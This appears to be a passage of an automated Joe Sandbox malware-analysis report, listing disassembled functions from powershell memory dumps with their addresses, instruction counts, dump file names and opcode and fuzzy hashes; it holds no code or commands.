                                                                                                                                      • Opcode Fuzzy Hash: d2e5731827a00a896c3708fdd5fc9bcb3ca6a266d9ba0790aacbc2a86df4a3ce
                                                                                                                                      • Instruction Fuzzy Hash: 4731AE769027849EEB60CF6AD0883CAFBF2EF89324F28C41ED55D9B245C7785482CB51
                                                                                                                                      Function 007EAD38 Relevance: .1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b69ba03744aecb02919deaead2067c2c1f53410bbca6561c2f877bb214e74b03
                                                                                                                                      • Instruction ID: ce157db0c7cb5cb3de4adbee8f7ff6b0e331415e6702e9aabbaf4ac094ca6e2a
                                                                                                                                      • Opcode Fuzzy Hash: b69ba03744aecb02919deaead2067c2c1f53410bbca6561c2f877bb214e74b03
                                                                                                                                      • Instruction Fuzzy Hash: C53164B4A00249DFEB44EF64D859ABE77B2EF84300F118479D115AB395DB79AD018FA0
                                                                                                                                      Function 06F726FF Relevance: .1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: afbffc138ae5be36076456b090a223b519beeb0db418cb2ada7b2e0080ce4b26
                                                                                                                                      • Instruction ID: 210b8e44d1c0a47373cc2b34c57045da20bd4386830a5046287a516e040975af
                                                                                                                                      • Opcode Fuzzy Hash: afbffc138ae5be36076456b090a223b519beeb0db418cb2ada7b2e0080ce4b26
                                                                                                                                      • Instruction Fuzzy Hash: F021A136E04205DFEFA4CF59C684BA9B7E5BB44361F04C167E8088B251C739DB86CBA1
                                                                                                                                      Function 0073F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ad4812d5a667553ad5fd410b1a836e7c66ce4f5c4c522de76cd8999ab445ac45
                                                                                                                                      • Instruction ID: fbffc13cdf09da47d3cbb8b1d8962fa9584813414118fc4641a9bd3d42e806dd
                                                                                                                                      • Opcode Fuzzy Hash: ad4812d5a667553ad5fd410b1a836e7c66ce4f5c4c522de76cd8999ab445ac45
                                                                                                                                      • Instruction Fuzzy Hash: 3521D172A04240EFEB05DF54D9C0B27BB65FB88314F24C5A9E9090A257C33AD856CBA1
                                                                                                                                      Function 0073F02C Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8d7e2bbdeefa666e1416e997efea17ae431b471b698456e407728943c422ba30
                                                                                                                                      • Instruction ID: 39e799585b97c519c47648925131d26bc41d830edc1cd73eac0843effecec123
                                                                                                                                      • Opcode Fuzzy Hash: 8d7e2bbdeefa666e1416e997efea17ae431b471b698456e407728943c422ba30
                                                                                                                                      • Instruction Fuzzy Hash: 0621D775904244EFEB18DF28D9C0B26BB65FB84314F24C57DD9494B247C37AD846CA61
                                                                                                                                      Function 007E9400 Relevance: .1, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2dba79399bef73fb09e9948fe59131271cfac78cd47ef07119e4a719bf7ee19d
                                                                                                                                      • Instruction ID: 752d8d42dd83dc6d93493fc3a591ad24cc2bab149faccbdc95d129b72328a324
                                                                                                                                      • Opcode Fuzzy Hash: 2dba79399bef73fb09e9948fe59131271cfac78cd47ef07119e4a719bf7ee19d
                                                                                                                                      • Instruction Fuzzy Hash: 22217E719067849EEB60CF6AC4887CAFBF2EB89310F28C41DD54D97245D7785441CB51
                                                                                                                                      Function 007E7848 Relevance: .1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0012df796026a78b49015d5490fd20662ea5d952e63b7fc792ed970fdabe2338
                                                                                                                                      • Instruction ID: c008d3da03e7e41ec4b269ce876eddfd4316c8a357e3b50ddd3ecac3b74155e8
                                                                                                                                      • Opcode Fuzzy Hash: 0012df796026a78b49015d5490fd20662ea5d952e63b7fc792ed970fdabe2338
                                                                                                                                      • Instruction Fuzzy Hash: DC119E753042149FDB089B6AE858D6A7BEAFF89720714046AE509C7395DF35DC01CB90
                                                                                                                                      Function 007E767C Relevance: .1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b95cc529720e78874375e9c022ed428672d37401c78743fab9c9d47fedb04465
                                                                                                                                      • Instruction ID: 0875f17a57a4745764631ab511f8868dac4bf670c989f43378361071c4c8619b
                                                                                                                                      • Opcode Fuzzy Hash: b95cc529720e78874375e9c022ed428672d37401c78743fab9c9d47fedb04465
                                                                                                                                      • Instruction Fuzzy Hash: F311047A7001188FCB04DBA9E8549AE77F6EBCC325B0440A5E909DB315DB39ED128BA0
                                                                                                                                      Function 0073F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 79743b7ef64e79def9027e5355c367a0ea036754744aa2e52695c6db9a72276b
                                                                                                                                      • Instruction ID: d2b73f8ec1afdfe9c73884ed729b7e6bee13c33d9731846869a261c024cc93ec
                                                                                                                                      • Opcode Fuzzy Hash: 79743b7ef64e79def9027e5355c367a0ea036754744aa2e52695c6db9a72276b
                                                                                                                                      • Instruction Fuzzy Hash: 21215C76904280DFDB06CF50D9C4B16BF72FB88314F24C5A9D9494A657C33AD86ACB91
                                                                                                                                      Function 007EE318 Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8a5e795c271a1f8db52526d23457b7176ad3f03ccde2004cbc064825bf42d4c
                                                                                                                                      • Instruction ID: bac12802b5434519a5e5991a29fe7c027ad75410bfaf96b1ab535b3b0feeefdd
                                                                                                                                      • Opcode Fuzzy Hash: e8a5e795c271a1f8db52526d23457b7176ad3f03ccde2004cbc064825bf42d4c
                                                                                                                                      • Instruction Fuzzy Hash: 2D117971901685CFDB10CF9AD604B9EBBF4AF48310F24886DD018A7281D3399944CBA1
                                                                                                                                      Function 0073F027 Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e074c66091f42264c338087dd8e67e8934f5c9a6a74f81f19a2831112881f99
                                                                                                                                      • Instruction ID: d416ca42eba3098662d180696e63b5b536109ecb077132a48ffc935c13d5dc09
                                                                                                                                      • Opcode Fuzzy Hash: 0e074c66091f42264c338087dd8e67e8934f5c9a6a74f81f19a2831112881f99
                                                                                                                                      • Instruction Fuzzy Hash: C4119D76904284DFDB15CF24D5C4B15FFA1FB84324F28C6AAD8494B657C33AD84ACB62
                                                                                                                                      Function 007EE328 Relevance: .1, Instructions: 51COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1fea2b89a71f4a1e696852929cc430f174b2d38bc4a0568fe3e16e00143da19b
                                                                                                                                      • Instruction ID: c7092d5700001478c775d6a6b4b69c3e9afd6ccd8e221b4b0b18d2571ccca19f
                                                                                                                                      • Opcode Fuzzy Hash: 1fea2b89a71f4a1e696852929cc430f174b2d38bc4a0568fe3e16e00143da19b
                                                                                                                                      • Instruction Fuzzy Hash: 471148B1901789CFDB10CF9AC544BDEBBF4EB48314F24886DD508A7241D339A944CFA5
                                                                                                                                      Function 007EBCE0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ed5ff5d67cc50752791c1e6e4100bc6205a1857b2b3f76563780c0f2e27bbf61
                                                                                                                                      • Instruction ID: 549f7e395f5d88fc9ca2781459e2c02e2d68ebbf50a35fae1b6a75d4905bac3d
                                                                                                                                      • Opcode Fuzzy Hash: ed5ff5d67cc50752791c1e6e4100bc6205a1857b2b3f76563780c0f2e27bbf61
                                                                                                                                      • Instruction Fuzzy Hash: 560192356093849FD728CB76D894BAA7FE5AF49310F1484AEE15ACB6A2CB34AC45C701
                                                                                                                                      Function 007E2C5C Relevance: .0, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fd6f4d2c39bda3e4c6dae4b3d5956ec205d2fd63ef301b6f58545f35797568d5
                                                                                                                                      • Instruction ID: d39b0b7e734c6deea3f321fa7f929f17819141d0880567bf5659e9676bcdf2e3
                                                                                                                                      • Opcode Fuzzy Hash: fd6f4d2c39bda3e4c6dae4b3d5956ec205d2fd63ef301b6f58545f35797568d5
                                                                                                                                      • Instruction Fuzzy Hash: 3011A571909294DFCB02CF6DD8A09EDBFB0EF4A314B1541C6D4649B2A3C6369C16CB66
                                                                                                                                      Function 007EE100 Relevance: .0, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c564941f6db3890d26d97ef899a1d7dc9b29bad1a4d55ffe10f6ee4f3497f64
                                                                                                                                      • Instruction ID: ff1510e74b074769f84f9192264fde3f0d66b045dceb427cc16dd5e7bfca790c
                                                                                                                                      • Opcode Fuzzy Hash: 0c564941f6db3890d26d97ef899a1d7dc9b29bad1a4d55ffe10f6ee4f3497f64
                                                                                                                                      • Instruction Fuzzy Hash: 941139342047408FC728DF39C04085ABBF2EF8931532089ADD44A877A0DB36EC41CF40
                                                                                                                                      Function 0073D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6922ef2bfbaef24a2ca48749bb82b98ad382521af0ba03de89613a37c1e3b499
                                                                                                                                      • Instruction ID: 8d8bef1f9f425442df4c7f1a5cd8b35b292b64b2c89b7efe9d5556a216ac38b8
                                                                                                                                      • Opcode Fuzzy Hash: 6922ef2bfbaef24a2ca48749bb82b98ad382521af0ba03de89613a37c1e3b499
                                                                                                                                      • Instruction Fuzzy Hash: 9801F232504340EAF7244A25E984B66FFA8EF82B60F18841AED081A283C37D9C45CAB1
                                                                                                                                      Function 007EDCD9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f6b3a932b71fdd49e0487ee1ab8726a02249f8cb3a14870c76a237e0637a988a
                                                                                                                                      • Instruction ID: ce3fe27e4ca16de7bb8556a0a73b631f70ede06b2631b20880b8389220b4aa0f
                                                                                                                                      • Opcode Fuzzy Hash: f6b3a932b71fdd49e0487ee1ab8726a02249f8cb3a14870c76a237e0637a988a
                                                                                                                                      • Instruction Fuzzy Hash: 9E01F731B051849BCB14DBB9E8148F9BFB69FCC220F18846AE40697351DE755C55CBA1
                                                                                                                                      Function 007EBF10 Relevance: .0, Instructions: 43COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 168f4b91abea331c384cbb83739e0db57e465f9f51638a7f4dd364439d34594f
                                                                                                                                      • Instruction ID: 532bbe336c84eb4e592ef3a2c4b108a9b8190a278b3bc929484d2f579e300215
                                                                                                                                      • Opcode Fuzzy Hash: 168f4b91abea331c384cbb83739e0db57e465f9f51638a7f4dd364439d34594f
                                                                                                                                      • Instruction Fuzzy Hash: 17F0F6727092A05FD7108A7A9C90AB7BFEDEFD9620B08447BF944C7391DA74CD1087A0
                                                                                                                                      Function 0073D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5e06ecc320fb281dd4d3f6414e0e934a3a2a6beac2e36164b919f804806e3238
                                                                                                                                      • Instruction ID: 1e569b96322c1ecd2aa1979fe05c8e1c7b555d3c509b9056b3e69d473f5a2a0e
                                                                                                                                      • Opcode Fuzzy Hash: 5e06ecc320fb281dd4d3f6414e0e934a3a2a6beac2e36164b919f804806e3238
                                                                                                                                      • Instruction Fuzzy Hash: B4F0F976200604AF97208F0AD985C63FBADEBD477071AC55AE84A4B612C771FC41CEA0
                                                                                                                                      Function 007E90D2 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c239ad10b72f7b633f7b2a173e8aba933a98aaee5bdc9989b5109ad020e9a538
                                                                                                                                      • Instruction ID: eafa668f746f6b3a62f1db19f86ad933f27472bd42b9e888873a95137155d864
                                                                                                                                      • Opcode Fuzzy Hash: c239ad10b72f7b633f7b2a173e8aba933a98aaee5bdc9989b5109ad020e9a538
                                                                                                                                      • Instruction Fuzzy Hash: 83F028B5B092849FE355AB34941D7AB7BB2DFC1314F1480EFD40A8B282CE3C1A06C7A1
                                                                                                                                      Function 0073D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba6ca412e29e81a1415b279fd29b8d8f3e803b4b4844f6e2885c3ffafb7d297d
                                                                                                                                      • Instruction ID: e329e343cc6257d6e0b46aeee05d2d8eb3d767aff800084c63c40a1adfbd67af
                                                                                                                                      • Opcode Fuzzy Hash: ba6ca412e29e81a1415b279fd29b8d8f3e803b4b4844f6e2885c3ffafb7d297d
                                                                                                                                      • Instruction Fuzzy Hash: BCF0C272005344AEF7248E16D884BA2FFD8EB91734F18C55AED480E282C3799C44CAB1
                                                                                                                                      Function 007E7968 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e4cca29283266d1fe2a357bf328c4fb3c69f0aa2d5f451d5820ab8b1bca7981
                                                                                                                                      • Instruction ID: 06ef2e7a990516a9fceaa9a29b0e414bdd998c54f09ff4e64ca63a85d00a34a6
                                                                                                                                      • Opcode Fuzzy Hash: 3e4cca29283266d1fe2a357bf328c4fb3c69f0aa2d5f451d5820ab8b1bca7981
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0A7317006159FD72497AAE844A6F77EAEB8C361F10052DE10DC3341DF74AD018BA4
                                                                                                                                      Function 0073D998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0bb78d133ca30b06c848408b95bc3cb83e732864e44823e8ec6f5c305209c7b2
                                                                                                                                      • Instruction ID: 16da781b7f70c92dce96795d85739d3bc0c876c3427d58b779d4d7317ec2482e
                                                                                                                                      • Opcode Fuzzy Hash: 0bb78d133ca30b06c848408b95bc3cb83e732864e44823e8ec6f5c305209c7b2
                                                                                                                                      • Instruction Fuzzy Hash: 28F06276100640AFD721CF06CD84D23BBB9EBC5720B1A8589E8494B312C731FC41CF60
                                                                                                                                      Function 007EDE38 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fc8ea281d239adc58aeebac41da86c20cdc33b8801c78f1a18709198999f5831
                                                                                                                                      • Instruction ID: e703d92c44b41d51e3b8496dd1c766cea0eaeb9743bdf1623b0c68c6bd0527dc
                                                                                                                                      • Opcode Fuzzy Hash: fc8ea281d239adc58aeebac41da86c20cdc33b8801c78f1a18709198999f5831
                                                                                                                                      • Instruction Fuzzy Hash: 3AF08C393051808FC3218B2DD4A8876BBF6AFDE31531900EAE198DF772CA61CC12CB40
                                                                                                                                      Function 007E90E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f8a167d6219e5507da115f574bc817abd0ad5dd3f609fac5b9e8f2663ef99a47
                                                                                                                                      • Instruction ID: 2c9e40d1cae4ff104570b392e881d0b0d5edb64670221df058ba20880003f91e
                                                                                                                                      • Opcode Fuzzy Hash: f8a167d6219e5507da115f574bc817abd0ad5dd3f609fac5b9e8f2663ef99a47
                                                                                                                                      • Instruction Fuzzy Hash: 3EF027B5604148ABF394AB69D01D7AB77A6DBC4314F10817AD90A47385CE3D2D01C7D1
                                                                                                                                      Function 007E7697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f0cfd8539deef89341054d4623bbea43f5b22980ff9b2070f404a49cbdf1510d
                                                                                                                                      • Instruction ID: d61aa39b006fcd95536386f7b82d6dd4c087acc7feca49f5b0faba0f80996454
                                                                                                                                      • Opcode Fuzzy Hash: f0cfd8539deef89341054d4623bbea43f5b22980ff9b2070f404a49cbdf1510d
                                                                                                                                      • Instruction Fuzzy Hash: F2F0E57A300508CFCB14CB6ED840A9A77E2EBCC354B0541A5F509CB315EB38DC02CB90
                                                                                                                                      Function 007E9158 Relevance: .0, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 94f3c5d5f945c4d7a3b1b0abcd26a318e3e2dc5f02fffd806badfca226e0c735
                                                                                                                                      • Instruction ID: fa2237d98c9f83b249095eb7eae4c3b0ea47ac038d17ab726b1aef7afbcb9055
                                                                                                                                      • Opcode Fuzzy Hash: 94f3c5d5f945c4d7a3b1b0abcd26a318e3e2dc5f02fffd806badfca226e0c735
                                                                                                                                      • Instruction Fuzzy Hash: 7FF082719053048BD7649FB8D49D7EA7BD5EB44310F00446DE65EC7381DB3D6880C790
                                                                                                                                      Function 007EDE48 Relevance: .0, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c636777bb444ad3d126ebb9eba9913ea594d293e730cb56acb98964c359f0dd
                                                                                                                                      • Instruction ID: 673ba1af81f92f8761c1a459f3224686d103ea66ca2e57090ad146c10cc4959e
                                                                                                                                      • Opcode Fuzzy Hash: 0c636777bb444ad3d126ebb9eba9913ea594d293e730cb56acb98964c359f0dd
                                                                                                                                      • Instruction Fuzzy Hash: B5E01A3A3011508F87209B1ED498C26B7FAEFDE76571900A9E549CF731DA71EC01CB90
                                                                                                                                      Function 007E9542 Relevance: .0, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7163a535540e0b075cab7dd4cd36d358914d87f8ba77e221f095ddee4226ade2
                                                                                                                                      • Instruction ID: a742f3fc896a27b7085ceaa50fb29205a721fa3cf608997349379dfde959fd15
